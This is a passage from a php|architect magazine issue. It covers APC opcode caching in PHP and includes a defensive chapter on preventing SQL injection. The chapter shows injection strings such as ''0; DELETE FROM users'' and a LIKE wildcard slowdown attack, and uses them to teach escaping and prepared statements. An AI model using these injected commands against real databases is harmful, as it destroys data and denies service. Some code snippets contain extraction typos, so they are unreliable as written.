partially written files from polluting the cache.
Employing this feature, however, doesn’t fix the
real problem—non-atomic file modification on a live
web server. The correct way to address this issue is to
only replace files atomically, by writing to a temp file
and then renaming the file to its intended destination
filename, or by using automated tools such as
rsync
,
that correctly handle the details of this maneuver, for
you. UNIX commands and applications such as
cp
,
tar
,
vi
and
emacs
often do not create files atomically.
Cache Slams
Another often-overlooked issue occurs when files on a
very busy server are changed.
Imagine a server whose front page gets hit hundreds
of times per second. When you modify that front page
file, many requests will see that the cached opcodes are
now stale and will attempt to compile and cache the
script from disk. APC doesn’t really mind this, as it is
smart enough to avoid any sort of race conditions during
the compile and cache procedure, so you will never end
up with an inconsistent cache. However, each request
that tries to cache a script starts allocating memory in
the cache at the same time. Once all the small chunks of
memory have been allocated and populated correctly, the
cache entry gets activated atomically and any previous
entries for the same file gets put on a deleted list
and deleted when everyone is done accessing it. This
means that modifying files on a busy server can lead
to many simultaneous memory allocations and you could
potentially fill up your shared memory segment because
of multiple concurrent requests all attempting to cache
the same file, at approximately the same time.
APC attempts to reduce the negative effects of this
situation, with a
slam_defense
option that can be
set to a percentage between
0
and
100
that indicates
the likelihood that a request that hits an uncached
file will skip trying to cache it. Very much like the
file_update_protection
setting, this is a mechanism
to ease the pain of something that really should be
handled differently, by the user (the person who deploys
the changed file, in this case). You can completely
eliminate both the partial update and the cache slam
problems by writing to a temporary file first; then, load
that temporary file once, through your webserver (and
thus, APC), to force it to be cached, and then rename
the file to its final destination. You might expect that
the file would be re-cached once its name is changed,
Volume 4 Issue 10 • php|architect • 15
Alternative PHP Cache
but recall that APC uses the device and inode of the file,
not its name to uniquely identify it. When you rename a
file, the inode doesn’t change, nor does the modification
time.
Userspace Access to the Cache
There are a couple of ways to make use of the cache from
your userspace PHP scripts.
The first way is to poke it for information about what
it is doing. The
apc.php
script that comes with APC is
an example of how to use the
apc_cache_info()
and
apc_sma_info()
functions. These return an array that
contains information about objects stored in the cache
and the amount of memory that each of these objects is
using.
apc_clear_cache()
lets you remove all entries
from the cache, without needing to restart your server.
Normally you wouldn’t need to call this function.
The
apc_store()
and
apc_fetch()
functions are
much more interesting. These allow you to store your
own data in the cache. Generally, you will want to use
these functions for relatively small amounts of data that
is used repeatedly, and is expensive to generate. For
example, you might have an XML-based configuration
file for your application. People have tended to shy away
from this in the past, but with the
simplexml
extension
in PHP 5, it is extremely easy to write a parser, and with
APC storing the parsed config array, it is also blazingly
fast. Take this sample config file:
<config>
<section name=”paths”>
<top>/var/www</top>
<include>/usr/share/php</include>
</section>
<section name=”database”>
<host>localhost</host>
<username>root</username>
</section>
</config>
The parser this is basically a one-liner. Well, a slightly
long line and split up into 3 to make it easier to read.
Ok, so it is a 3-liner:
$xml = simplexml_load_file(‘conf.xml’);
foreach($xml->section as $entry)
$config[(string)$entry[‘name’]] =
(array)$entry;
This should be mostly self-explanatory: Load the XML file
using
simplexml
, loop through each section and use the
$entry[‘name’]
shortcut for picking the
name
attribute
FIGURE 1
Volume 4 Issue 10 • php|architect • 16
Alternative PHP Cache
out of the entry, and make this
name
the key for each
section sub-array. Then, since below each section in our
example, we just have flat XML with no attributes, nor
sub-nodes, we can just cast it directly to an array and
stick the data directly into our
$config
array. If you have
a completely flat XML config file, you could just cast
$xml
directly to an array and you are done, but usually
configuration files are slightly more complex, and you
need to decide how to deal with attributes and what you
want your final array to look like. The above three lines
give us an array like this:
Array (
[paths] => Array (
[top] => /var/www
[include] => /usr/share/php
)
[database] => Array (
[host] => localhost
[username] => root
)
)
Now we can add
apc_store()
/
apc_fetch()
caching
and our entire xml-based parsing and caching solution
becomes:
if(!$config=apc_fetch(‘config’)) {
$xml = simplexml_load_file(‘conf.xml’);
foreach($xml->section as $entry)
$config[(string)$entry[‘name’]] =
(array)$entry;;
apc_tore(‘config’,$config);
}
You may want to add a bit of error checking to make
sure that the
conf.xml
file actually exists, and if you
are going to do that, it means a
stat()
call. You might
as well make use of that extra system call and pull in
the modification time, using
filemtime()
. So, our final
approach would look like this:
mtime=@filemtime(‘conf.xml’) or die(“conf.xml is
missing!”);
if((!$config=apc_fetch(‘config’))||$config[‘mtim
e’]<$mtime) {
$xml = simplexml_load_file(‘conf.xml’);
$config[‘mtime’] = time();
foreach($xml->section as $entry)
$config[(string)$entry[‘name’]] =
(array)$entry;
apc_tore(‘config’,$config);
}
Now we can change our
conf.xml
file all we want, and it
will be reparsed on the request that immediately follows
the change, and cached in shared memory between
changes.
apc_store()
takes a third optional argument,
which is the number of seconds to cache the passed
data. This makes it easy to use the store/fetch method
for caching remote data where you want to fetch a new
version every 30 minutes, for example.
Real world Performance Numbers
Let’s look at 4 examples of what you can expect when
you add APC to your system.
First a common photo album application: Gallery
(version 1). With no opcode cache, hitting a page of an
album in Gallery with 9 photos on it, yields just over
9 requests per second. That’s not very fast. Although,
looking at it a different way, it is about 800,000 requests/
day. Of course, that is just for the HTML for that album
page and doesn’t include all of the extra requests needed
to fetch each thumbnail and whatever other images are
on there. Still, it is probably more than fast enough for
your family album. But, faster is always better. Adding
APC gets us up to 30 requests/second, without changing
a single line of code. At these speeds, you do notice
a difference. An application that normally attains 30
requests/second, versus one that puts out 10 requests/
second, feels snappier. Or turn it around: 33ms to finish
a request vs. 110ms.
With a slight tweak, we can bring this up to about 32
requests/second. Not much of an improvement. The low-
hanging fruit is usually the configuration information for
an application like this. Unfortunately, Gallery stores its
config in nested classes that will need to be serialized
and unserialized. Improving on this makes Gallery a bit
faster, but probably not worth the maintenance headache
of having locally modified files. It is just a couple of
lines in Gallery’s
config.php
file, though. At the top:
if($tmp = apc_fetch(‘gallery’)) {
$gallery=unserialize($tmp);
return;
}
And at the bottom:
apc_store(‘gallery’,serialize($gallery));
You get a bigger win with applications that use arrays
for their configuration—especially if they have localized
the config file inclusion to one or two places so you can
eliminate an entire include with something like:
if(!$config=apc_fetch(‘config’)) include ‘config.
inc’;
And, of course, at the bottom of config.inc you would
need to add:
apc_tore(‘config’,$config);
Volume 4 Issue 10 • php|architect • 17
Alternative PHP Cache
This serialization of objects will be done by APC,
internally, soon so it will go a bit faster by eliminating
the extra userspace unserialize call, but it will still be
nowhere near as fast as using an array that gets copied
directly out of shared memory.
FUDforum-2.6 is a popular bulletin board application.
Without APC, viewing a message thread with a couple
of messages in it gets me 46 requests/second. Turning
on APC brings that up to 160 requests/second. Looking
at FUDforum’s config system, it (unfortunately) uses a
bunch of global variables in a file called
GLOBALS.php
.
This file also includes a bunch of other things, and it is
included from all over, so it isn’t easy to eliminate the
include call, nor is it easy to cache the actual config
variables. But it can be done. At the top of
GLOBALS.php
we can add:
if(!$globals = apc_fetch(‘globals’)) {
$cnt = count($GLOBALS)+1;
And at the bottom:
$globals = array_slice($GLOBALS,$cnt);
apc_store(‘globals’,$globals);
} else extract($globals);
The main performance problem here is the need to do
the
extract()
. In the end, this slows us down to about
153 requests/second. If there was heavier logic and
perhaps an SQL query or some XML parsing involved in
creating the list of variables, then this approach would
have helped.
Serendipity—also known as s9y—is an application
for people who want to host their own weblogs. I get
10 requests/second on a plain PHP installation, and
37 requests/second after adding APC. Although the
configuration system is array-based, there is plenty of
logic intertwined, so it is also difficult to cache this
information in s9y.
Finally, let’s look at a code snippet written with APC
in mind. I recently needed a flexible and fast RSS/Atom
feed reader. It uses
simplexml
and a couple of PHP5.1
tricks to reduce the RSS or Atom XML data down into
an easily cacheable array. The code is a bit long to
include here, but fire up a browser and have a look at it–
The inline comments
should help make sense of the code. It is basically just a
complicated example of the XML-based config file parser
we developed earlier, but now, we get some numbers.
You will notice there are two levels of caching.
It caches the parsed XML to shared memory with
apc_store()
and it also caches the downloaded raw XML
to disk. I tend to do this because I have multiple things
reading these various XML files and they sometimes have
different ideas of what is interesting in them. This way I
can have different parsers that parse the disk-cached XML
into their own shared memory slots, but don’t need to hit
the backend server for each separate application. On my
lerdorf.com server I have ,
and itself all
wanting to access some of the same XML files in very
different ways.
Now, for the numbers: I am using my RSS2 feed
from as the sample XML file.
Without any caching at all—not even disk-based raw
XML caching—I get about 25 requests per second. But
that number is very variable, depending on the amount
of traffic on the remote server, and general network
latency issues. It is clear that fetching the entire remote
76kB XML file on every request is not a smart thing
to do. Simply caching the XML data between requests
brings that number way up to 165 requests per second.
Finally, and most dramatically, adding
apc_store()
and
apc_fetch()
takes us to 550 requests/second. This
brings us to the point where getting a 76kB XML feed
into an easily walkable array is basically free, from a
performance perspective. That’s less than 2ms per end-
to-end request on a rather low-end 1.8GHz Athlon box
with IDE drives, running Ubuntu Linux, and an untuned
default Apache install. Turning off
Keepalive
, and
changing
MaxRequestsPerChild
from its default
100
to
0
(unlimited), brings that number up to 590 requests per
second.
Conclusion: Speed is Good!
Opcode caching plus injecting user caching in the
right places in your application can result in dramatic
performance gains.
In my RSS example, I went from 25 requests/second
to nearly 600. In a full application, there are performance
gains to be had all along the way. You need to look at
where your data comes from, how often it changes, and
how close to the final presentation format you can get
it to, before it is cached. Applications that were not
designed with this in mind from the start can be difficult
to retrofit. Keep your designs simple and clean. Do not
use objects as datastores, and try to avoid spaghetti
include sequences—your applications will be easier to
deploy and will run much faster.
SQL Injection
Volume 4 Issue 10 • php|architect • 18
FEATURE
TO DISCUSS THIS ARTICLE VISIT:
/>T
he goal of SQL injection is to insert arbitrary
data, most often a database query, into a string
that’s eventually executed by the database.
The insidious query may attempt any number
of actions, from retrieving alternate data, to
modifying or removing information from the database.
To demonstrate the problem, consider this excerpt:
// supposed input
$name = “ilia’; DELETE FROM users;”;
mysql_query(“SELECT * FROM users WHERE
name=’{$name}’”);
The function call is supposed to retrieve a record from
the users table where the name column matches the
name specified by the user. Under normal circumstances,
$name
would only contain alphanumeric characters and
perhaps spaces, such as the string
ilia
. But here, by
appending an entirely new query to
$name
, the call to the
database turns into disaster: the injected DELETE query
removes all records from users.
MySQL Exception
Fortunately, if you use MySQL, the
mysql_query()
function does not permit query stacking, or executing
multiple queries in a single function call. If you try to
stack queries, the call fails.
However, other PHP database extensions, such as
SQLite and PostgreSQL, happily perform stacked queries,
executing all of the queries provided in one string and
creating a serious security problem.
SQL injection is a common vulnerability that is the result of lax
input validation. In this excerpted chapter from
php|architect’s Guide to PHP Security, you will learn how to thwart
this type of attack.
by
ILIA ALSHANETSKY
author of
php|architect’s
Guide to PHP Security
SQL INJECTION
Volume 4 Issue 10 • php|architect • 19
SQL Injection
Magic Quotes
Given the potential harm that can be caused by SQL
injection, PHP’s automatic input escape mechanism,
magic_quotes_gpc
, provides some rudimentary
protection. If enabled,
magic_quotes_gpc
, or “magic
quotes”, adds a backslash in front of single-quotes,
double-quotes, and other characters that could be used
to break out of a value identifier. But, magic quotes
is a generic solution that doesn’t include all of the
characters that require escaping, and the feature isn’t
always enabled. Ultimately, it’s up to you to implement
safeguards to protect against SQL injection.
To help, many of the database extensions available for
PHP include dedicated, customized escape mechanisms.
For example, the MySQL extension for PHP provides the
function
mysql_real_escape_string()
to escape input
characters that are special to MySQL:
if (get_magic_quotes_gpc()) {
$name = stripslashes($name);
}
$name = mysql_real_escape_string($name);
mysql_query(“SELECT * FROM users WHERE
name=’{$name}’”);
However, before calling a database’s own escaping
mechanism, it’s important to check the state of
magic quotes. If magic quotes is enabled, remove any
backslashes (
\
) it may have added; otherwise, the input
will be doubly-escaped, effectively corrupting it (because
it differs from the input supplied by the user).
In addition to securing input, a database-specific
escape function prevents data corruption. For example,
the escape function provided in the MySQL extension is
aware of connection characters and encodes those (and
others) to ensure that data isn’t corrupted by the MySQL
storage mechanism and vice versa.
Native escape functions are also invaluable for
storing binary data: left “unescaped”, some binary data
may conflict with the database’s own storage format,
leading to the corruption or loss of a table or the entire
database. Some database systems, such as PostgreSQL,
offer a dedicated function to encode binary data.
Rather than escape problematic characters, the function
applies an internal encoding. For instance, PostgreSQL’s
pg_escape_bytea()
function applies a Base64-like
encoding to binary data:
// for plain-text data use:
pg_escape_string($regular_strings);
// for binary data use:
pg_escape_bytea($binary_data);
A binary data escaping mechanism should also be used
to process multi-byte languages that aren’t supported
natively by the database system. (Multi-byte languages
such as Japanese use multiple bytes to represent a single
character; some of those bytes overlap with the ASCII
range normally only used by binary data.)
There’s a disadvantage to encoding binary data: it
prevents persisted data from being searched other than
by a direct match. This means that a partial match query
such as
LIKE ‘foo%’
won’t work, since the encoded
value stored in the database won’t necessarily match the
initial encoded portion looked for by the query.
For most applications, though, this limitation isn’t a
major problem, as partial searches are generally reserved
for human readable data and not binary data, such as
images and compressed files.
Prepared Statements
While database-specific escape functions are useful, not
all databases provide such a feature. In fact, database-
specific escape functions are relatively rare. (At the
moment) only the MySQL, PostgreSQL, SQLite, Sybase,
and MaxDB extensions provide them. For other databases,
including Oracle, Microsoft SQL Server, and others, an
alternate solution is required.
A common technique is to Base64-encode all values
passed to the database, thus preventing any special
characters from corrupting the underlying store or
causing trouble. But Base64-encoding expands data
roughly 33 percent, requiring larger columns and more
storage space. Furthermore, Base64-encoded data has
the same problem as binary encoded data in PostgreSQL:
it cannot be searched with
LIKE
. Clearly a better solution
is needed—something that prevents incoming data from
affecting the syntax of the query.
Prepared queries (also called prepared statements)
solve a great many of the aforementioned risks. Prepared
queries are query “templates”: the structure of the query
is pre-defined and fixed, and includes placeholders that
stand-in for real data. The placeholders are typically
type-specific—for example,
int
for integer data and
text
for strings—which allows the database to interpret
the data strictly. For instance, a text placeholder is
always interpreted as a literal, avoiding exploits such as
the query stacking SQL injection. A mismatch between
a placeholder’s type and its incoming datum cause,
execution errors, adding further validation to the query.
In addition to enhancing query safety, prepared
queries improve performance. Each prepared query is
parsed and compiled once, but can be re-used over and
over. If you need to perform an
INSERT
en masse, a pre-
compiled query can save valuable execution time.
Preparing a query is fairly simple. Here is an
SQL Injection
Volume 4 Issue 10 • php|architect • 20
example:
pg_query($conn, “PREPARE stmt_name (text) AS “
.” SELECT * FROM users WHERE name=$1”);
pg_query($conn, “EXECUTE stmt_name ({$name})”);
pg_query($conn, “DEALLOCATE stmt_name”);
PREPARE stmt_name (text) AS ...
creates a prepared
query named
stmt_name
that expects one text value.
Everything following the keyword
AS
defines the actual
query, except
$1
is the placeholder for the expected
text.
If a prepared statement expects more than one
value, list each type in order, separated by a comma,
and use
$1
,
$2
, and so on for each placeholder, as in
PREPARE stmt_example (text, int) AS SELECT *
FROM users WHERE name=$1 AND id=$2
.
Once compiled with
PREPARE
, you can run the prepared
query with
EXECUTE
. Specify two arguments: the name of
the prepared statement (such as
stmt_name
) to run and
a list of actual values enclosed in parentheses.
Once you’re finished with the prepared statement,
dispose of it with
DEALLOCATE
. Forgetting to jettison
prepared queries can cause future
PREPARE
queries to
fail. This is a common error when persistent database
connections are used, where a statement can persist
across requests. For example, given that there is no way
to check if a statement exists or not, a blind attempt
to create one anyway will trigger a query error if one is
already present.
As nice as prepared queries are, not all databases
support them; in those instances escaping mechanisms
should be used.
No Means of Escape
Alas, escape functions do not always guarantee data
safety. Certain queries can still permit SQL injection,
even after escapes are applied.
Consider the following situation, where a query
expects an integer value:
$id = “0; DELETE FROM users”;
$id = mysql_real_escape_string($id); // 0;
DELETE FROM users
mysql_query(“SELECT * FROM users WHERE
id={$id}”);
When executing integer expressions, it’s not necessary
to enclose the value inside single quotes. Consequently,
the semicolon character is sufficient to terminate the
query and inject an additional query. Since the semicolon
doesn’t have any “special” meaning, it’s left as-is by both
the database escape function and
addslashes()
.
There are two possible solutions to the problem.
The first requires you to quote all arguments. Since
single quotes are always escaped, this technique prevents
SQL injection. However, quoting still passes the user
input to the database, which is likely to reject the query.
Here is an illustrative example:
$id = “0; DELETE FROM users”;
$id = pg_escape_string($id); // 0; DELETE FROM
users
pg_query($conn, “SELECT * FROM users WHERE
id=’{$id}’”)
or die(pg_last_error($conn));
// will print invalid input syntax for integer:
// “0; DELETE FROM users”
But query failures are easily avoided, especially when
validation of the query arguments is so simple. Rather
than pass bogus values to the database, use a PHP cast
to ensure each datum converts successfully to the desired
numeric form.
For example, if an integer is required, cast the
incoming datum to an
int
; if a complex number is
required, cast to a float.
$id = “123; DELETE FROM users”;
$id = (int) $id; // 123
pg_query($conn, “SELECT * FROM users WHERE
id={$id}”);
// safe
A cast forces PHP to perform a type conversion. If the
input is not entirely numeric, only the leading numeric
portion is used. If the input doesn’t start with a numeric
value or if the input is only alphabetic and punctuation
characters, the result of the cast is
0
. On the other hand,
if the cast is successful, the input is a valid numeric
value and no further escaping is needed.
Numeric casting is not only very effective, it’s
also efficient, since a cast is a very fast, function-free
operation that also obviates the need to call an escape
routine.
The LIKE Quandary
The SQL
LIKE
operator is extremely valuable: its
%
and
_
(underscore) qualifiers match 0 or more characters and
any single character, respectively, allowing for flexible
partial and substring matches. However, both
LIKE
qualifiers are ignored by the database’s own escape
functions and PHP’s magic quotes. Consequently, user
input incorporated into a
LIKE
query parameter can
subvert the query, complicate the
LIKE
match, and in
many cases, prevent the use of indices, which slows a
query substantially. With a few iterations, a compromised
LIKE
query could launch a Denial of Service attack by
overloading the database.
Here’s a simple yet effective attack:
Volume 4 Issue 10 • php|architect • 21
SQL Injection
$sub = mysql_real_escape_string(“%something”);
// still %something
mysql_query(“SELECT * FROM messages “
. “WHERE subject LIKE ‘{$sub}%’”);
The intent of the
SELECT
above is to find those messages
that begin with the user-specified string,
$sub
.
Uncompromised, that
SELECT
query would be quite fast,
because the index for subject facilitates the search. But
if
$sub
is altered to include a leading
%
qualifier (for
example), the query can’t use the index and the query
takes far longer to execute—indeed, the query gets
progressively slower as the amount of data in the table
grows.
The underscore qualifier presents both a similar and a
different problem. A leading
underscore in a search
pattern, as in
_ish
, cannot
be accelerated by the
index, slowing the query.
And a trailing underscore
may substantially alter
the results of the query.
To complicate matters
further, underscore is a
very common character
and is frequently found in
perfectly valid input.
To address the
LIKE
quandary, a custom
escaping mechanism must
convert user-supplied
%
and
_
characters to literals. Use
addcslashes()
, a function
that lets you specify a
character range to escape.
$sub = addcslashes(mysql_real_escape_
string(“%something_”),
“%_”);
// $sub == \%something\_
mysql_query(“SELECT * FROM messages “
. ”WHERE subject LIKE ‘{$sub}%’”);
Here, the input is processed by the database’s
prescribed escape function and is then filtered through
addcslashes()
to escape all occurrences of
%
and
_
.
addcslashes()
works like a custom
addslashes()
,
is fairly efficient, and much faster alternative than
str_replace()
or the equivalent regular expression.
Remember to apply manual filters after the SQL
filters to avoid escaping the backslashes; otherwise,
the escapes are escaped, rendering the backslashes as
literals and causing special characters to re-acquire
special meanings.
SQL Error Handling
One common way for hackers to spot code vulnerable
to SQL injection is by using the developer’s own tools
against them. For example, to simplify debugging of
failed SQL queries, many developers echo the failed query
and the database error to the screen and terminate the
script.
mysql_query($query)
or die(“Failed query: {$query}<br />”.mysql_
error());
While very convenient for spotting errors, this code can
cause several problems when deployed in a production
environment. (Yes, errors do occur in production code
for any number of
reasons.) Besides being
embarrassing, the code
may reveal a great deal
of information about the
application or the site.
For instance, the end-user
may be able discern the
structure of the table and
some of its fields and may
be able to map GET/POST
parameters to data to
determine how to attempt
a better SQL injection
attack. In fact, the SQL
error may have been
caused by an inadvertent
SQL injection. Hence, the
generated error becomes a
literal guideline to devising
more tricky queries.
The best way to avoid revealing too much information
is to devise a very simple SQL error handler to handle SQL
failures:
function sql_failure_handler($query, $error) {
$msg = htmlspecialchars(“Failed Query:
{$query}<br>”
.”SQL Error: {$error}”);
error_log($msg, 3, “/home/site/logs/sql_error_
log”);
if (defined(‘debug’)) {
return $msg;
}
return “Requested page is temporarily
unavailable, “
.”please try again later.”;
}
mysql_query($query)
or die(sql_failure_handler($query, mysql_
error()));
Fortunately, the
mysql_query()
function does
not permit
query stacking.
SQL Injection
Volume 4 Issue 10 • php|architect • 22
The handler function takes the query and error message
generated by the database and creates an error string
based on that information. The error string is passed
through
htmlspecialchars()
to ensure that none of the
characters in the string are rendered as HTML, and the
string is appended to a log file.
The next step depends on whether or not the script is
working in debug mode or not. If in debug mode, the error
message is returned and is likely displayed on-screen for
the developer to read. In production, though, the specific
message is replaced with a generic message, which hides
the root cause of the problem from the visitor.
Authentication Data Storage
Perhaps the final issue to consider when working with
databases is how to store your application’s database
credentials—the login and password that grant access
to the database. Most applications use a small PHP
configuration script to assign a login name and password
to variables. This configuration file, more often than
not (at least on shared hosts), is left world-readable
to provide the web server user access to the file. But
world-readable means just that: anyone on the same
system or an exploited script can read the file and steal
the authentication information stored within. Worse,
many applications place this file inside web readable
directories and give it a non-PHP extension—
.inc
is a
popular choice. Since
.inc
is typically not configured to
be interpreted as a PHP script, the web browser displays
such a file as plain-text for all to see.
One solution to this problem uses the web server’s
own facilities, such as
.htaccess
in Apache, to deny
access to certain files. As an example, this directive
denies access to all files that end (notice the
$
) with
the string
.inc
.
<Files ~ “\.inc$”>
Order allow,deny
Deny from all
</Files>
Alternatively, you can make PHP treat
.inc
files as scripts
or simply change the extension of your configuration
files to
.php
or, better yet,
.inc.php
, which denotes
that the file is an include file.
However, renaming files may not always be the safest
option, especially if the configuration files have some
code aside from variable initialization in the main scope.
The ideal and simplest solution is to simply not keep
configuration and non-script files inside web server-
accessible directories.
That still leaves world-readable files vulnerable to
exploit by local users.
One seemingly effective solution is to encrypt the
sensitive data. Database authentication credentials could
be stored in encrypted form, and only the applications
that know the secret key can decode them. But this use
of encryption only makes theft slightly more difficult
and merely shifts the problem instead of eliminating it.
The secret key necessary to decrypt the credentials must
still be accessible by PHP scripts running under the web
server user, meaning that the key must remain world-
readable. Back to square one…
A proper solution must ensure that other users on
the system have no way of seeing authentication data.
Fortunately, the Apache web server provides just such
a mechanism. The Apache configuration file, httpd.conf
can include arbitrary intermediate configuration files
during start-up while Apache is still running as root.
Since root can read any file, you can place sensitive
information in a file in your home directory and change
it to mode
0600
, so only you and the superuser can read
and write the file.
One common way for hackers to spot
code vulnerable to SQL injection is by using
the developer’s own tools against them.
Volume 4 Issue 10 • php|architect • 23
SQL Injection
<VirtualHost ilia.ws>
Include /home/ilia/sql.cnf
</VirtualHost>
If you use the
Include
mechanism, be sure that your
file is only loaded for a certain
VirtualHost
or a certain
directory to prevent the data from being available to
other hosts on the system.
The content of the configuration file is a series of
SetEnv
lines, defining all of the authentication parameters
necessary to establish a database connection.
SetEnv DB_LOGIN “login”
SetEnv DB_PASSWD “password”
SetEnv DB_DB “my_database”
SetEnv DB_HOST “127.0.0.1”
After Apache starts, these environment variables are
accessible to the PHP script via the
$_SERVER
super-global
or the
getenv()
function if
$_SERVER
is unavailable.
echo $_SERVER[‘DB_LOGIN’]; // login
echo getenv(“DB_LOGIN”); // login
An even better variant of this trick is to hide the
connection parameters altogether, hiding them even
from the script that needs them. Use PHP’s
ini
directives
to specify the default authentication information for the
database extension. These directives can also be set
inside the hidden Apache configuration file.
php_admin_value mysql.default_host “127.0.0.1”
php_admin_value mysql.default_user “login”
php_admin_value mysql.default_password
“password”
Now,
mysql_connect()
works without any arguments, as
the missing values are taken from PHP
ini
settings. The
only information remaining exposed would be the name
of the database.
Because the application is not aware of the database
settings, it consequently cannot disclose them through a
bug or a backdoor, unless code injection is possible. In fact,
you can enforce that only an
ini
-based authentication
procedure is used by enabling SQL safe mode in PHP
via the
sql.safe_mode
directive. PHP then rejects any
database connection attempts that use anything other
than
ini
values for specifying authentication data.
This approach does have one weakness in older
versions of PHP: up until PHP 4.3.5, there was a bug in
the code that leaked
ini
settings from one virtual host
to another. Under certain conditions, this bug could be
triggered by a user, effectively providing other users on
the system with a way to see the
ini
values of other
users.
If you’re using an older version of PHP, stick to the
environment variables or upgrade to a newer version
of PHP, which is a very good idea anyway, since older
releases include many other security problems.
Database Permissions
The last database security tip has nothing to do with PHP
per se, but is sound advice that can be applied to every
component in your system. In general, grant the fewest
privileges possible.
For example, if a user only requires read-access to
the database, don’t permit the user to execute
UPDATE
or
INSERT
queries. Or more realistically, limit write access
to those tables that are expected to change—perhaps
the session table and the user accounts table.
By limiting what a user can do, you can detect, track,
and defang many SQL injection attacks. Limiting access
at the database level is supplemental: you should use it
in addition to all of the database security mechanisms
listed in this chapter.
Maintaining Performance
Speed isn’t usually considered a security measure, but
subverting your application’s performance is tantamount
to any other exploit. As was demonstrated by the
LIKE
attack, where
%
was injected to make a query very slow,
enough costly iterations against the database could
saturate the server and prevent further connections.
Unoptimized queries present the same risk: if the attacker
spots inefficiencies, your server can be exhausted and
rendered useless just the same.
To prevent database overloading, there are a few
simple rules to keep in mind.
Only retrieve the data you need and nothing more.
Many developers take the “
*
” shortcut and fetch all
columns, which may result in a lot of data, especially
when joining multiple tables. More data means more
information to retrieve, more memory for the database’s
temporary buffer for sorting, more time to transmit the
results to PHP, and more memory and time to make the
results available to your PHP application. In some cases,
with large amounts of data, database sorting must be
done within a search file instead of memory, adding to
the overall time to process a request. Again, only retrieve
the data you need, and name the columns to minimize
size further.
To further accelerate a query, try using unbuffered
queries that retrieve query results a small portion at a
time. However, unbuffered queries must be used carefully:
only one result cursor is active at any time, limiting you
to work with one query at a time. (And in the case of
SQL Injection
Volume 4 Issue 10 • php|architect • 24
MySQL, you cannot even perform
INSERT
,
UPDATE
, and
other queries until all results from the result cursor have
been fetched).
To work with a database, PHP must establish a
connection to it, which in some cases can be a rather
expensive option, especially when working with complex
systems like Oracle, PostgreSQL, MSSQL, and so on.
One trick that speeds up the connection process is to
make a database connection persistent, which allows
the database handle to remain valid even after the
script is terminated. If a connection is persistent, each
subsequent connection request from the same web server
process reuses the connection rather than recreating it
anew.
The code below creates a persistent MySQL database
connection via the
mysql_pconnect()
function, which is
syntactically identical to the regular
mysql_connect()
function.
mysql_pconnect(“host”, “login”, “passwd”);
Other databases typically offer a persistent connection
variant, some as simple as adding the prefix “p” to the
word “connect”.
Anytime PHP tries to establish a persistent connection,
it first looks for an existing connection with the same
authentication values; if such a connection is available,
PHP returns that handle instead of making a new one.
Words of Caution
Persistent connections are not without drawbacks. For
example, in PHP, connection pooling is done on a per-
process basis rather than per-web server, giving every
web-server process its own connection pool. So, 50 Apache
processes result in 50 open database connections. If the
database is not configured to allow at least that many
connections, further connection requests are rejected,
breaking your web pages.
In many cases, the database runs on the same machine
as the web server, which allows data transmission to be
optimized. Rather than using the slow and bulky TCP/IP,
your application can use Unix Domain Sockets (UDG), the
second fastest medium for Inter Process Communication
(IPC). By switching to UDG, you can significantly improve
the data transfer rates between the two servers.
To switch to UDG, change the host parameter of the
connection. For example, in MySQL, set the host, followed
by the path to the UDG.
mysql_connect(“:/tmp/mysql.sock”, “login”,
“passwd”);
pg_connect(“host=/tmp user=login
password=passwd”);
In PostgreSQL, where there’s no need for a special host
identifier, simply set the host parameter to the directory
where the UDG can be found and enjoy the added
performance.
Query Caching
In some instances, a query is as fast as it can be, yet
still takes significant time to execute. If you cannot
throw hardware at the problem—which has its limits as
well—try to use the query cache. A query cache retains
a query’s results for some period of time, short-circuiting
the need to recreate the results from scratch each time
the same query runs.
Each time there’s a request for a page, the cache is
checked; if the cache is empty, if the cache expired the
previous results, or if the cache was invalidated (say, by
an
UPDATE
or an
INSERT
), the query executes. Otherwise,
the results saved in the cache are returned, saving time
and effort.
ILIA ALSHANETSKY
is the principal of Advanced Internet Designs
Inc., which specializes in security auditing, performance analysis
and application development. He is the author of FUDforum
(
), a highly popular, Open Source bulletin board,
focused on providing the maximum functionality at the highest levels
of security and performance. Ilia is a core PHP Developer, an active
member of PHP’s QA team, and was the Release Master for the PHP
4.3.x series. He has authored and co-authored a number of extensions,
most notably SHMOP, PDO, SQLite and GD, and is responsible for a
large number of bug fixes and performance tweaks in the language.
A prolific lecturer and writer, Ilia can found speaking at international
conferences. He is frequently published in print and online magazines
on a variety of PHP topics, and is also the author of an upcoming book
on PHP security. Ilia can be reached at
.
dynamic web pages - german php.node
news . scripts . tutorials . downloads . books . installation hints
Dynamic Web Pages
www.dynamicwebpages.de
sex could not be better
|